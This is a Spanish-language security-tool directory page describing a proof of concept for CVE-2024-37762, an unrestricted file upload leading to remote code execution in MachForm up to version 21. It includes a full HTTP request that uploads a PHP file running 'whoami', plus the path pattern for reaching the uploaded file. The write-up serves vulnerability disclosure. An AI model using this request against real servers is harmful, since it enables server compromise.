Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2024-37762 — Prueba de concepto de explotación para la subida de archivos sin restricciones autenticada que conduce a la ejecución remota de código en MachForm hasta la versión 21, con ejemplos detallados de solicitudes y pasos de explotación. | Kitploit
Herramientas/GitHubGitHub/atreb92/cve-2024-37762
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubatreb92/cve-2024-37762

cve-2024-37762

Prueba de concepto de explotación para la subida de archivos sin restricciones autenticada que conduce a la ejecución remota de código en MachForm hasta la versión 21, con ejemplos detallados de solicitudes y pasos de explotación.

Ver Repositorio
112hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Descripción

MachForm hasta la versión 21 se ve afectado por una carga de archivos sin restricciones autenticada que conduce a una ejecución remota de código.

La aplicación ofrece la posibilidad de crear un formulario con funcionalidad de carga de archivos. Aunque por defecto los archivos aceptados están restringidos a un subconjunto seguro común, el creador del formulario también puede especificar formatos adicionales que están permitidos.

Si un usuario con derechos de creación de formularios crea un formulario con funcionalidad de carga de archivos donde se permite el formato “PHP”, cualquier usuario no autenticado puede explotar este formulario para obtener ejecución remota de código.

Riesgo

  • Severidad: Crítica
  • Puntuación CVSS v3.1: 9.9
  • Vector CVSS v3.1: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Recursos Afectados

  • Versión: hasta MachForm v21
  • https://<application-baseurl>/upload.php

Evidencia

Para explotar esta vulnerabilidad, se requiere tener un formulario con funcionalidad de carga de archivos habilitada que tenga extensiones “PHP” en la lista blanca.

image_1

Una vez que se cumple este requisito previo, cualquier usuario no autenticado puede navegar al formulario para explotar la vulnerabilidad de carga de archivos.

Los archivos cargados en el formulario, que aún no han sido enviados dentro del formulario, se cargan en el servidor web en un directorio predeterminado con formato .tmp.

image_2

Solicitud:

root@kitploit:~
POST /upload.php HTTP/1.1
Host: application-baseurl
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://application-baseurl
Content-Type: multipart/form-data; boundary=---------------------------6934955361623015052738262130
Content-Length: 657
Origin: https://application-baseurl
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

-----------------------------6934955361623015052738262130
Content-Disposition: form-data; name="Filedata"; filename="whoami.php"
Content-Type: application/x-php

<?php
echo 'whoami = '.exec('/usr/bin/whoami');
?>
-----------------------------6934955361623015052738262130
Content-Disposition: form-data; name="form_id"

62461
-----------------------------6934955361623015052738262130
Content-Disposition: form-data; name="element_id"

1
-----------------------------6934955361623015052738262130
Content-Disposition: form-data; name="file_token"

9d96df33b71cadaad638c20f0540da39
-----------------------------6934955361623015052738262130--

La ruta completa del archivo cargado se puede construir utilizando la solicitud de carga, que contiene todos los campos requeridos:

/data/form_{form_id}/files/element_{element_id}_{file_token}-{file_name}.php.tmp

En este escenario, la URL del archivo cargado será la siguiente:

/data/form_62461/files/element_1_9d96df33b71cadaad638c20f0540da39-whoami.php.tmp

image_3

Una vez obtenida la ejecución remota de código, es posible operar directamente en el servidor objetivo, lo que permitiría adquirir acceso más allá del alcance de la aplicación y permitiría leer información sensible o alterar/eliminar componentes principales.

Descargar herramienta